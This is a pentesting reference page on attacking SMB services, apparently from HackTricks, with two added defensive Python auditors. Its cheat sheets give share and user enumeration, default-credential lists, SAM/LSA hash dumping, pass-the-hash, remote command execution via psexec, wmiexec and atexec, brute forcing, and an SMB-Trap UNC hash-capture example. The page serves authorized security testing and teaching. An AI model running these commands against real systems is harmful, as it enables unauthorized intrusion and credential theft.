# 139,445 - Pentesting SMB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? Or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
## **Port 139**

**NetBIOS** stands for _Network Basic Input Output System_. It is a software protocol that allows applications, PCs and desktops on a local area network (LAN) to communicate with network hardware and to transmit data across the network. Software applications that run on a NetBIOS network locate and identify each other via their NetBIOS names. A NetBIOS name is up to 16 characters long and is usually separate from the computer name. Two applications start a NetBIOS session when one (the client) sends a command to "call" another client (the server) over **TCP port 139**. (extracted from [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for))

```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```

## Port 445

While port 139 is known technically as "NBT over IP", port 445 is "SMB over IP". **SMB** stands for "**Server Message Blocks**". Server Message Block in modern language is also known as **Common Internet File System**. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports and other sorts of communication between nodes on a network.

For instance, on Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. This will use, as you point out, port 445. On other systems, you'll find services and applications using port 139. That means that SMB is running with NetBIOS over TCP/IP. (extracted from [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for))

```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```

### SMB

Server Message Block (`SMB`) is a **client-server** protocol that regulates access to files, entire directories and other network resources such as printers, routers or interfaces released for the network. The main application area of the protocol is the **Windows** operating system series, whose network services support SMB in a downward-compatible manner, which means that devices with newer editions can easily communicate with devices that have an older Microsoft operating system installed.\
With the free software project **Samba**, **SMB** is also available for Linux and Unix distributions, enabling cross-platform communication via SMB.

An SMB server can provide **arbitrary parts of its local file system as shares**. Therefore the **hierarchy** visible to a client is **partially independent of the structure on the server**. **Access rights** are defined by `Access Control Lists` (`ACLs`). They can be controlled in a **fine-grained manner** based on attributes such as **`execute`**, **`read`** and **`full access`** for individual users or user groups. The **ACLs** are defined on the basis of the shares and therefore do not correspond to the rights assigned locally on the server.

### IPC$ Share

From the book _**Network Security Assessment 3rd edition**_

Through an anonymous null session you can access the IPC$ share and interact with services exposed via named pipes. The enum4linux utility within Kali Linux is useful; with it, you can obtain the following:

* Operating system information
* Details of the parent domain
* A list of local users and groups
* Details of available SMB shares
* The effective system security policy

## What is NTLM

If you don't know what NTLM is, or want to know how it works and how to abuse it, you will find this page about **NTLM** very interesting, where it is explained **how this protocol works and how you can take advantage of it:**

{% content-ref url="../windows-hardening/ntlm/" %}
[ntlm](../windows-hardening/ntlm/)
{% endcontent-ref %}

## **Server Enumeration**

### **Scan** a network searching for hosts:

```bash
nbtscan -r 192.168.0.1/24
```

### SMB server version

To look for possible exploits of the SMB version it's important to know which version is being used. If this information doesn't appear in other tools, you can:

* Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb\_version**
* Or this script:

```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
# Adjust the capture interface (tap0 below) to the one facing the target.
if [ -z "$1" ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost="$1"; fi
if [ -n "$2" ]; then rport="$2"; else rport=139; fi
tcpdump -s0 -n -i tap0 src "$rhost" and port "$rport" -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L "$rhost" 1>/dev/null 2>/dev/null
echo "" && sleep .1
```

### **Search exploits**

Besides the commands below, the usual places to look up known exploits for the detected SMB version are exploit databases (Exploit-DB, Rapid7, Metasploit), vulnerability scanners (Nessus, OpenVAS, Nexpose) and the vendors' own security bulletins. Use them only with proper authorization.
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```

### **Possible** Credentials

| **Username(s)** | **Common passwords** |
| -------------------- | ----------------------------------------- |
| _(blank)_ | _(blank)_ |
| guest | _(blank)_ |
| Administrator, admin | _(blank)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |

### SMB Environment Information

### Obtain Information

```bash
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```

### Enumerate Users, Groups & Logged On Users

This information should already have been gathered by enum4linux and enum4linux-ng.

```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
```

### Enumerate local users

[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)

```bash
lookupsid.py -no-pass hostname.local
```
Oneliner that walks RIDs 500 to 1100 and prints the user name and the user/group RIDs of each one:

```bash
for i in $(seq 500 1100); do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""; done
```

### Metasploit - Enumerate local users

```bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
```

### **Enumerating LSARPC and SAMR rpcclient**

{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
[rpcclient-enumeration.md](pentesting-smb/rpcclient-enumeration.md)
{% endcontent-ref %}

### GUI connection from linux

#### In the terminal:

`xdg-open smb://cascade.htb/`

#### In file browser window (nautilus, thunar, etc)

`smb://friendzone.htb/general/`

## Shared Folders Enumeration

### List shared folders

It is always recommended to check whether you can access anything; if you don't have credentials, try using **null credentials/guest user**.
```bash
## smbclient
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash

## smbmap
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<LMHASH>:<NTHASH>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list

## crackmapexec
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
```

### **Connect/List a shared folder**

```bash
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient

#List with smbmap; without a folder it lists everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-recursive list
smbmap -u "username" -p "<LMHASH>:<NTHASH>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```

### **Manually enumerate windows shares and connect to them**

It may be that you are restricted from listing the shares of the host machine, so when you try to list them it appears as if there aren't any shares to connect to. Thus it might be worth a shot to try to manually connect to a share. To enumerate the shares manually, look for responses like NT\_STATUS\_ACCESS\_DENIED and NT\_STATUS\_BAD\_NETWORK\_NAME when using a valid session (e.g. a null session or valid credentials). These indicate whether the share exists but you do not have access to it, or whether the share does not exist at all.
Common share names for windows targets are

* C$
* D$
* ADMIN$
* IPC$
* PRINT$
* FAX$
* SYSVOL
* NETLOGON

(Common share names from _**Network Security Assessment 3rd edition**_)

You can try to connect to them by using the following command

```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
```

or this script (using a null session)

```bash
#!/bin/bash

ip='<IP>' # target host
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')

for share in ${shares[*]}; do
    output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')

    if [[ -z $output ]]; then
        echo "[+] creating a null session is possible for $share" # no output if command succeeded, thus assuming that a session was created
    else
        echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
    fi
done
```

examples

```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### Mount a shared folder

```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```

### **Download files**

Read the previous sections to learn how to connect with credentials/Pass-the-Hash.

```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
```

```bash
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
```

Commands:

* mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files)
* recurse: toggles recursion on (default: off)
* prompt: toggles prompting for filenames off (default: on)
* mget: copies all files matching the mask from host to client machine

(_Information from the manpage of smbclient_)

### Domain Shared Folders Search

* [**Snaffler**](https://github.com/SnaffCon/Snaffler)****

```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```

* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
  * `-M spider_plus [--share <share_name>]`
  * `--pattern txt`

```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```

Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contain credentials.

{% hint style="info" %}
The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\
You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**.
{% endhint %}

## Read Registry

You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try:

```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```

## Post Exploitation

The **default config of** a **Samba** server is usually located in `/etc/samba/smb.conf` and might have some **dangerous configs**:

| **Setting** | **Description** |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes` | Allow listing available shares in the current share? |
| `read only = no` | Forbid the creation and modification of files? |
| `writable = yes` | Allow users to create and modify files? |
| `guest ok = yes` | Allow connecting to the service without using a password? |
| `enable privileges = yes` | Honor privileges assigned to specific SID? |
| `create mask = 0777` | What permissions must be assigned to the newly created files? |
| `directory mask = 0777` | What permissions must be assigned to the newly created directories? |
| `logon script = script.sh` | What script needs to be executed on the user's login? |
| `magic script = script.sh` | Which script should be executed when the script gets closed? |
| `magic output = script.out` | Where the output of the magic script needs to be stored? |

The command `smbstatus` gives information about the **server** and about **who is connected**.

## Authenticate using Kerberos

You can **authenticate** to **kerberos** using the tools **smbclient** and **rpcclient**:

```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```
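The smb.conf table in the Post Exploitation section above is easy to check by hand on one box and tedious on a fleet. The following auditor is an added example (not HackTricks' or the Samba project's code): it parses an `smb.conf` the way Samba reads it (parameter names are case- and whitespace-insensitive, `#`/`;` lines are comments, and a service parameter set in `[global]` is inherited by every share that does not override it), folds the synonyms Samba accepts (`writeable`, `write ok`, `public`) onto the names used in the table, and reports each tabulated risky setting together with the share it applies to. `SAMPLE_SMB_CONF` is constructed for the demonstration.

```python
r"""Audit a Samba smb.conf for the risky settings listed in the table above.

Added example; not code from HackTricks or from the Samba project.
"""
import re

# Samba synonyms folded onto the name the table uses. 'read only' is the
# inverse of 'writable' and is handled separately in audit().
SYNONYMS = {"writeable": "writable", "write ok": "writable", "public": "guest ok"}
YES = {"yes", "true", "1"}


def normalize_key(key):
    """Samba ignores case and internal whitespace in parameter names."""
    key = re.sub(r"\s+", " ", key.strip().lower())
    return SYNONYMS.get(key, key)


def parse_smb_conf(text):
    """Return {section: {parameter: value}} with names normalised."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue  # Samba itself rejects parameters outside a section
        key, value = line.split("=", 1)
        sections[current][normalize_key(key)] = value.strip()
    return sections


def effective(sections, share, param):
    """Value of a service parameter for a share, inheriting from [global] as Samba does."""
    value = sections.get(share, {}).get(param)
    return value if value is not None else sections.get("global", {}).get(param)


def is_world_writable(mask):
    """True when an octal mask such as 0777 grants write to 'other'."""
    try:
        return bool(int(mask, 8) & 0o002)
    except ValueError:
        return False


def audit(text):
    """Return (section, setting, value, why) tuples for every risky setting found."""
    sections = parse_smb_conf(text)
    findings = []

    # Parameters Samba only honours in [global]
    g = sections.get("global", {})
    if g.get("enable privileges", "").lower() in YES:
        findings.append(("global", "enable privileges", g["enable privileges"],
                         "privileges assigned to specific SIDs are honoured"))
    if "logon script" in g:
        findings.append(("global", "logon script", g["logon script"],
                         "this script runs at every user logon"))

    # Service parameters, evaluated per share with [global] inheritance
    for share in sections:
        if share == "global":
            continue

        def value(param, _share=share):
            return effective(sections, _share, param)

        def is_yes(param):
            v = value(param)
            return v is not None and v.lower() in YES

        if is_yes("browseable"):
            findings.append((share, "browseable", "yes", "share is listed to anyone browsing the server"))
        read_only = value("read only")
        if is_yes("writable") or (read_only is not None and read_only.lower() not in YES):
            findings.append((share, "writable", "yes", "clients may create and modify files"))
        if is_yes("guest ok"):
            findings.append((share, "guest ok", "yes", "clients may connect without a password"))
        for mask in ("create mask", "directory mask"):
            v = value(mask)
            if v is not None and is_world_writable(v):
                findings.append((share, mask, v, "new entries are world-writable"))
        for param, why in (("magic script", "this script runs when the client closes it"),
                           ("magic output", "magic script output is written here")):
            v = value(param)
            if v is not None:
                findings.append((share, param, v, why))
    return findings


# Constructed sample: odd casing/whitespace and a synonym on purpose.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   enable privileges = yes
   logon script = script.sh
   Create Mask = 0775

[public]
   path = /srv/public
   ; 'public' is Samba's synonym for 'guest ok'
   public = yes
   read only = no
   directory mask = 0777

[archive]
   path = /srv/archive
   writeable = no
   browseable = no
   magic script = cleanup.sh
   magic output = cleanup.out
"""

if __name__ == "__main__":
    for section, setting, value, why in audit(SAMPLE_SMB_CONF):
        print(f"[{section}] {setting} = {value}: {why}")
```

Point `audit()` at the text of `/etc/samba/smb.conf` (or at `testparm -s` output, which already has defaults expanded) to get the list of shares that are guest-accessible, writable or world-writable; `[archive]` in the sample shows that a share can be read-only and unbrowseable and still carry a `magic script` that deserves a look.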

## **Execute Commands**

### **crackmapexec**

crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec**, **wmiexec** being the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`:

```bash
apt-get install crackmapexec

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Execute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in-memory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups #Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups #Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```

### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)

Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to the ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put the payload in the arguments, a **file-less technique**).\
**More info** about [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md) and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/

```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t #Use pass the hash
```

Using **parameter** `-k` you can authenticate against **kerberos** instead of **NTLM**

### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec

Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/

```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to execute, if you don't do it, a semi-interactive shell will be prompted
```

Using **parameter** `-k` you can authenticate against **kerberos** instead of **NTLM**

```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to execute, if you don't do it, a semi-interactive shell will be prompted
```

### [AtExec](../windows-hardening/ntlm/atexec.md)

Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/

```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
```

## Impacket reference

[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)

## **Bruteforce users credentials**

**This is not recommended, you could lock an account if you exceed the maximum allowed tries**

```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```

## SMB relay attack

This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

## SMB-Trap

The Windows library URLMon.dll automatically tries to authenticate to the host when a page tries to access some content via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"`

This happens with the functions:

* URLDownloadToFile
* URLDownloadToCache
* URLOpenStream
* URLOpenBlockingStream

Which are used by some browsers and tools (like Skype)

![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)

### SMBTrap using MitMf

![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)

## NTLM Theft

Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can elicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder.
The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack).

[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)

## HackTricks Automatic Commands

```
Protocol_Name: SMB    #Protocol Abbreviation if there is one.
Port_Number: 137,138,139     #Comma separated if there is more than one.
Protocol_Description: Server Message Block         #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for SMB
  Note: |
    While Port 139 is known technically as 'NBT over IP', Port 445 is 'SMB over IP'. SMB stands for 'Server Message Blocks'. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.

    #These are the commands I run in order every time I see an open SMB port

    With No creds
    nbtscan {IP}
    smbmap -H {IP}
    smbmap -H {IP} -u null -p null
    smbmap -H {IP} -u guest
    smbclient -N -L //{IP}
    smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
    rpcclient {IP}
    rpcclient -U "" {IP}
    crackmapexec smb {IP}
    crackmapexec smb {IP} --pass-pol -u "" -p ""
    crackmapexec smb {IP} --pass-pol -u "guest" -p ""
    GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
    GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
    GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
    getArch.py -target {IP}

    With Creds
    smbmap -H {IP} -u {Username} -p {Password}
    smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
    smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
    crackmapexec smb {IP} -u {Username} -p {Password} --shares
    GetADUsers.py {Domain_Name}/{Username}:{Password} -all
    GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
    GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

    https://book.hacktricks.xyz/pentesting/pentesting-smb

Entry_2:
  Name: Enum4Linux
  Description: General SMB Scan
  Command: enum4linux -a {IP}

Entry_3:
  Name: Nmap SMB Scan 1
  Description: SMB Vuln Scan With Nmap
  Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}

Entry_4:
  Name: Nmap Smb Scan 2
  Description: SMB Vuln Scan With Nmap (Less Specific)
  Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}

Entry_5:
  Name: Hydra Brute Force
  Description: Need User
  Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

Entry_6:
  Name: SMB/SMB2 139/445 consoleless mfs enumeration
  Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
```
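Returning to the SMB-Trap section above: the `img src="\\10.10.10.10\path\image.jpg"` pattern is easy to spot in content you host or proxy before an URLMon-based client ever fetches it. The scanner below is an added example (not HackTricks' code, and not a description of any real product's detection): it runs a page through Python's `html.parser` and reports every URL-bearing attribute whose value names a remote SMB host, whether as a UNC path, a `file:` URL with a host component (`file://host/...` or `file:////host/...`) or an `smb://` URL, while ignoring local `file:///C:/...` references. The attribute list and `SAMPLE_HTML` are assumptions constructed for the demonstration.

```python
r"""Flag HTML references that would make a client open an SMB session (SMB-Trap).

Added example; not code from HackTricks. Detection only: it reports which
element, attribute and host would trigger the outbound SMB authentication.
"""
import re
from html.parser import HTMLParser

# Attributes a client may fetch without user interaction (assumed list)
URL_ATTRS = {"src", "href", "data", "action", "background", "poster", "icon"}

UNC_RE = re.compile(r"^\\\\([^\\/]+)(?:[\\/]|$)")  # \\host\share\...
SMB_RE = re.compile(r"^smb://([^/]+)", re.IGNORECASE)


def remote_host(value):
    """Host a client would open an SMB session to for this reference, or None."""
    v = value.strip()
    m = UNC_RE.match(v)
    if m:
        return m.group(1)
    if v.lower().startswith("file:"):
        rest = v[len("file:"):]
        body = rest.lstrip("/\\")
        slashes = len(rest) - len(body)
        # file://host/path (2 slashes) and file:////host/share (4 slashes)
        # name a remote host; file:///C:/path (3 slashes) is a local drive.
        if slashes in (2, 4) and body:
            host = re.split(r"[/\\]", body, maxsplit=1)[0]
            if host and not re.fullmatch(r"[A-Za-z]:?", host):
                return host
        return None
    m = SMB_RE.match(v)
    return m.group(1) if m else None


class SmbReferenceScanner(HTMLParser):
    """Collect (tag, attribute, value, host) for every remote SMB reference."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name and value and name.lower() in URL_ATTRS:
                host = remote_host(value)
                if host:
                    self.findings.append((tag, name.lower(), value, host))


def scan_html(text):
    """Parse a page and return its remote SMB references in document order."""
    scanner = SmbReferenceScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


# Constructed page: a clean image, a UNC image like the one quoted above,
# a stylesheet via file:////host, a local file: link and an smb:// object.
SAMPLE_HTML = r"""<html><body>
<img src="https://cdn.example.test/logo.png">
<img src="\\10.10.10.10\path\image.jpg">
<link rel="stylesheet" href="file:////203.0.113.5/share/style.css">
<a href="file:///C:/Windows/notepad.exe">local</a>
<object data="smb://fileserver.example.test/public/doc.pdf"></object>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, value, host in scan_html(SAMPLE_HTML):
        print(f"<{tag} {attr}> -> {host}  ({value})")
```

On the sample the scanner reports three references, to `10.10.10.10`, `203.0.113.5` and `fileserver.example.test`, and nothing for the HTTPS image or the local `file:///C:/` link; a host that is not one of your own file servers is the signal to act on. Combine it with an egress rule that blocks TCP 445 to the Internet, since the hash only leaves the network if the session can be opened.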